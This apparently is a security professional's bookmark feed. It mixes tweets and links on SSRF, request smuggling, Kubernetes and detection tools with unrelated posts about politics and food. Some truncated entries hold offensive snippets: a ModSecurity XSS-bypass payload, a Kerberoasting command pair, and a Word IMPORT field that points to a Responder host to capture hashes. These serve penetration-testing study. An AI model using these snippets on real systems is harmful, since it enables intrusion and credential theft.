SSRF in the Wild - The Startup - Medium
When looking for SSRF vulnerabilities, file upload URLs, proxies and webhooks are good places to start. But also pay attention to the SSRF entry points that are less obvious: URLs embedded in files that are processed by the application, hidden API endpoints that accept URLs as input, and HTML tag injections.
ssrf  pentest  webapp 
22 hours ago
Forseti Security / About
Forseti Security is a collection of community-driven, open-source tools to help you improve the security of your Google Cloud Platform (GCP) environments. Forseti consists of core modules that you can enable, configure, and execute independently of each other. Community contributors are also developing add-on modules to offer unique capabilities. Forseti’s core modules work together, and provide a foundation that others can build upon.
forseti  gcp  cloud  security 
23 hours ago
Twitter
I really wish Cisco and Juniper would stop doing this stuff, accidentally or otherwise.
yesterday
Twitter
pulse secure directory traversal bug explained-

/dana-na/ <- "na" means "no authentication", urls not starting wit…
yesterday
Neo23x0/sigma: Generic Signature Format for SIEM Systems
Sigma is a generic and open signature format that allows you to describe relevant log events in a straightforward manner. The rule format is very flexible, easy to write and applicable to any type of log file. The main purpose of this project is to provide a structured form in which researchers or analysts can describe their once developed detection methods and make them shareable with others.
analytics  security  siem 
yesterday
Hinodeya, a Japanese ramen shop with a 134-year history, opens in Dallas on Wednesday | GuideLive
Back in June, we told you about a wave of groundbreaking ramen that was about to hit Dallas. Now one of the most exciting new noodle shops is opening on Greenville Avenue.
dallas  restaurants 
yesterday
Twitter
ModSecurity {" XSS "} ~Bypass braindeath; ⓾

~1; " %3Cspyerror%20script%20goes%20here%3E=%0AByPass "
~2; "%3Cscript…
2 days ago
Making an antivirus engine : Guidelines - Adlice Software
Favorite tweet:

Making an antivirus engine : the guidelines https://t.co/xDHuehCETC

Very useful reference to understand basic AV internals!

— Cn33liz (@Cneelis) August 21, 2019
antivirus  c++  windows 
2 days ago
Twitter
As YouTube videos go, this is a great one. It's called "Preventing the Collapse of Civilization" and it's partiall…
2 days ago
Twitter
RT : I have commandeered
the GPUs
that are on
the shared server

and which
you were probably
saving
for your experiment…
2 days ago
Twitter
Okay, Wordpress and `chmod 777`, which were big issues in 2009, seem to still be big issues in 2019.

I've never s…
2 days ago
Twitter
Even worse: the class is reactionary hippie BS against Silicon Valley instead of corporate BS, causing students to…
3 days ago
Twitter
My inner cynic says: Whose ethics would be taught? Who hires, or refuses to hire, the graduates?

Welcome to Stanf…
3 days ago
Twitter
I guess you'd have to stop somewhere around where the opponent did. A sizable gap at any level wo…
3 days ago
Twitter
RT : Mad respect for Cathay Pacific CEO Rupert Hogg.
3 days ago
Twitter
Game theory. If you have enough to destroy the world once and the adversary has far more they mig…
3 days ago
Twitter
Point is still surviving a massive first strike with enough to hit back. Or rather deterring that…
3 days ago
Twitter
Oof, looks like I'll be publishing a Metasploit module for pulse secure sooner than expected since some people ment…
3 days ago
Twitter
The best representation of technical analysis I've had the pleasure to study.
4 days ago
Twitter
RT : Paged Out! is out! (and it's free to download!)

There are 57 articles in 12 categories:…
4 days ago
Twitter
It sounds like something I'd say. Performative anything is trash, but especially this. Even in Texas I'…
4 days ago
Twitter
It might have been who once said something about people who insist on performative open-carry eventually aff…
4 days ago
Security - Kubernetes
As you can see from the above figure, each one of the 4C’s depends on the security of the squares in which they fit. It is nearly impossible to safeguard against poor security standards in Cloud, Containers, and Code by only addressing security at the code level. However, when these areas are dealt with appropriately, then adding security to your code augments an already strong base. These areas of concern will now be described in more detail below.
kubernetes  security 
4 days ago
vmware/octant: A web-based, highly extensible platform for developers to better understand the complexity of Kubernetes clusters.
Octant is a tool for developers to understand how applications run on a Kubernetes cluster. It aims to be part of the developer's toolkit for gaining insight and approaching complexity found in Kubernetes. Octant offers a combination of introspective tooling, cluster navigation, and object management along with a plugin system to further extend its capabilities.
kubernetes  devops  tools 
4 days ago
HTTP Desync Attacks: Request Smuggling Reborn | Blog - PortSwigger
HTTP requests are traditionally viewed as isolated, standalone entities. In this paper, I'll explore forgotten techniques for remote, unauthenticated attackers to smash through this isolation and splice their requests into others, through which I was able to play puppeteer with the web infrastructure of numerous commercial and military systems, rain exploits on their visitors, and harvest over $70k in bug bounties.
webapp  pentest  security  http  requestsmuggling 
4 days ago
HTTP Request Smuggler - PortSwigger
This is an extension for Burp Suite designed to help you launch HTTP Request Smuggling attacks. It supports scanning for Request Smuggling vulnerabilities, and also aids exploitation by handling cumbersome offset-tweaking for you.
burp  requestsmuggling  webapp  pentest 
4 days ago
Twitter
The only two real people on Twitter are me and you. And I'm not sure about you. Or me.
4 days ago
Twitter
There are many paths to totalitarianism. One is being such a hydrophobic dillhole that your friends and neighbors…
4 days ago
Twitter
There's a whole secretive world of digital espionage and spy vs. spy going on constantly. Check out "Information W…
5 days ago
Twitter
How To Attack Kerberos 101

Get-DomainSPNTicket -SPN <spn> -OutputFormat hashcat -Credential $cred

hashcat64.exe -…
5 days ago
Twitter
Any Debian based distro is fine unless you're really used to RedHat, in which case CentOS. Fedora is cool…
5 days ago
Twitter
A number of people were invested in my Twitter interview process. I wrote a blog post about it that is a little mor…
6 days ago
Twitter
RT : This is amazing propaganda. Chinese state media produced a rap video (in English, so it’s targeted at the West)...…
6 days ago
Twitter
Implicitly comparing Hong Kong protesters to Nazis is a bold move by the Chicoms, Cotton. Let's see if that pays o…
6 days ago
Twitter
Fair warning, if you start studying information warfare you will
Need to learn a lot of sociology, anthropology, hi…
6 days ago
Twitter
If you don't have a subscription to the Athletic, sign up for the free trial for this. Even if you hate the sports…
7 days ago
MITRE Systems Engineering Guide
Collected wisdom from MITRE’s systems engineering experts
mitre  systems 
7 days ago
Twitter
RT : I need advice. Found subdomain takeover in a large company. Submitted a bug bounty showing ACTIVE spoofing of their…
8 days ago
Twitter
This is true even without any context whatsoever.
8 days ago
Twitter
Had some Haunted Ghost Pepper chips today. I like spicy food and those are the first commercial snacks…
8 days ago
Twitter
So I, a person with 500 Twitter followers, pointed out that one account had more followers than another and got 177…
9 days ago
Twitter
If you're an internal pen tester, see if you can get your psychopath CEO to pitch in on your next social engineerin…
9 days ago
Twitter
This Epstein autopsy thing reminds me of that old joke about the policeman in the witness box... "He called me a pi…
9 days ago
Twitter
About 36 MINUTES away from starting the OSCP Exam... Couldn't be more hyped. Feeling confident.
9 days ago
Twitter
: for those of you pentesting large companies, make sure to check their internal source control repos (Githu…
9 days ago
(429) https://twitter.com/i/web/status/1161468039679885312
IANAL, but I believe the magic words to use with HR are "Equal Pay Act of 1963", which is a law most Americans…
10 days ago
(429) https://twitter.com/i/web/status/1161429419946328065
RT : CVE-2019-1211 Git for Visual Studio Elevation of Privilege Vulnerability. I discovered this while looking for an un…
10 days ago
Twitter
RT : I am finding that criticizing the following corporations will get you attacked by online trolls in increasing order…
10 days ago
Twitter
Submitted this to MSRC, won't patch, it's a "feature"; Open Word -> CTRL + F9 -> IMPORT "\\\\Responder-IP\\1.jpg" -…
10 days ago
Twitter
I don't see being annoyed by it, much less blocking you. You have to do what feels right…
11 days ago
Twitter
RT : There are 5985 AWS privileges. 2505 (42%) have no condition restrictions possible (other than the global conditions…
11 days ago
Twitter
That's fair, but it's still worth noting that hate crimes are below, say, the 2009 leve…
11 days ago
Twitter
I don't know if my brain is going to be able to handle the "Justice Department suddenly 'uncovers' problems at fede…
11 days ago
Twitter
I will say that Patrick can hardly be blamed for not knowing how far America's violent…
11 days ago
Twitter
That said, numbers aren't everything, and there certainly is considerable shitbaggery t…
11 days ago
Twitter
Page 7 of this report. Hate crime statistics aren't perfect but they have ticked up w…
12 days ago
Twitter
About a nanosecond after this article was published Uber announced that they are freezing engineering hires. Reall…
12 days ago
CEOs Who Cheat on Spouse Twice as Likely to Cheat at Work: Study - Bloomberg
Cheating on your spouse goes hand in hand with cheating in the workplace.
ethics  adultery  sociology 
12 days ago
Master plan of the universe revealed in new galaxy maps
In these vivid 3D maps, which Tully calls “Cosmicflows,” the universe takes on a startlingly new appearance. You won’t find our solar system or any familiar stars. You won’t even find our home galaxy, the Milky Way. The scale is so vast that entire galaxies shrink to dots, blend together and vanish into the bigger picture, like pixels on a computer screen.

What pops out at the end is nothing less than the master plan of the universe, seen across nearly a billion light-years. It contains a physical record of everything that has happened in our part of the universe since the time of the Big Bang.
astronomy  science 
12 days ago
Twitter
Meet the Ministry of Literature!
Do you have what it takes to be judged by these ladies?…
14 days ago
LAN-Based Blind SSRF Attack Primitive for Windows Systems (switcheroo) – initblog.com
Unauthenticated attackers on a local network can force stock Windows systems to perform arbitrary HTTP GET requests, including to the target’s localhost interface. No user interaction is required. No IIS installation is required. Network Discovery must be enabled to trigger the exploit (usually on by default for private networks). The response cannot be viewed by the attacker, making this a “Blind Server-Side Request Forgery” vulnerability.
ssrf  ssdp  windows  exploit 
14 days ago
Gone to the Dogs | Shenanigans Labs
Just in time for our DEF CON workshop “Constructing Kerberos Attacks with Delegation Primitives”, Microsoft failed to meet the disclosure deadline, and so we publish another primitive that can be abused to achieve Windows Local Privilege Escalation (LPE). It affects all domain-joined Windows 10 hosts by default, as well as Windows Server 2016 and Windows Server 2019 that have the WebDAV Redirector feature installed.
activedirectory  pentest  privilegeescalation 
14 days ago
Twitter
Now it’s time to start getting our game up. Remember I said that we’d be getting back to the “what” of hacking? Wel…
14 days ago
Don’t Underestimate Grep Based Code Scanning
Below is the starter pack of rules. Some rules are clearly more noisy than others — people can pick and choose the ones they want to focus on.
grep  staticanalysis  security  code 
14 days ago
Twitter
If you aren't in Vegas and miss that chill room music.
15 days ago
Twitter
I'm listening to it while I work. I've always appreciated that provides…
15 days ago
Twitter
The slides and videos from our workshop on Active Directory attacks are now online! Access the deck and vide…
15 days ago
Twitter
I get that anybody can sue anybody for anything and it's expensive, but if I'm a Texas gun manufacturer I…
15 days ago
Twitter
Does that reduce the supply of guns? 34 states have their own variants of the PLCAA, including Texas and…
15 days ago
Twitter
We would like to extend our sincere and heartfelt thanks to our Champion, Dr. Zena Jackson, and to everyone at…
15 days ago
Twitter
I want to know what we millennials have messed up now but I can't figure out this chart.
15 days ago
Twitter
The difference between guns and tobacco would seem to be that tobacco goes stale. If you want to sell ci…
15 days ago
Twitter
The big rush towards making blue/defense a core component of all training classes there seems to be a gap in the mo…
16 days ago
Penetration Tester at State Farm
RT : Looking for pentesters in the Dallas area! Wonderfully skilled team that I’m proud to be a part of. Come join us!
16 days ago
Twitter
RT : FBI gave a preso at once. I got a lot of flak for that from the community. It didn'…
16 days ago